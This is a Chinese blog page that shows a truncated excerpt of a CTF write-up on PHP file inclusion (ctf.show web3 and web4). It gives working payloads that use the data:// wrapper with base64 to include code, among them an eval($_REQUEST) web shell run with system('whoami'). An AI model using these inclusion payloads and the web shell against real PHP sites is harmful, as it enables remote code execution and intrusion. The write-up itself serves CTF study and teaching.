TypechoJoeTheme

MUCN博客

统计
登录
用户名
密码
/
注册
用户名
邮箱
搜索到 1 篇与 CTF 的结果
2021-02-09

CTF文件包含类例题

CTF文件包含类例题
提到文件包含肯定第一处想到的知识点就是 php伪协议(暂无此文)例题:ctf.show_web3进入界面首先一段代码:如果直接传入数据流 include是无法包含的但是可以使用php的伪协议进行传入数据流,让include进行包含原始数据流payload?url=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==写一个代码执行:<?php eval($_REQUEST[mucn]); ?> base64编码后: PD9waHAgZXZhbCgkX1JFUVVFU1RbbXVjbl0pOyA/Pg==payload?url=data://text/plain;base64,PD9waHAgZXZhbCgkX1JFUVVFU1RbbXVjbl0pOyA/Pg==&mucn=system(%27whoami%27);//命令执行总结:非常基础的文件包含例题例题:ctf.show_web4进入界面:和web3一样的界面使用上题一样的手法进行尝试:发现error 目测是拦截开始逐个判断是拦截了哪些内容Php 拦截D...
2021年02月09日
36 阅读
0 评论

人生倒计时

今日已经过去小时
这周已经过去
本月已经过去
今年已经过去个月

标签云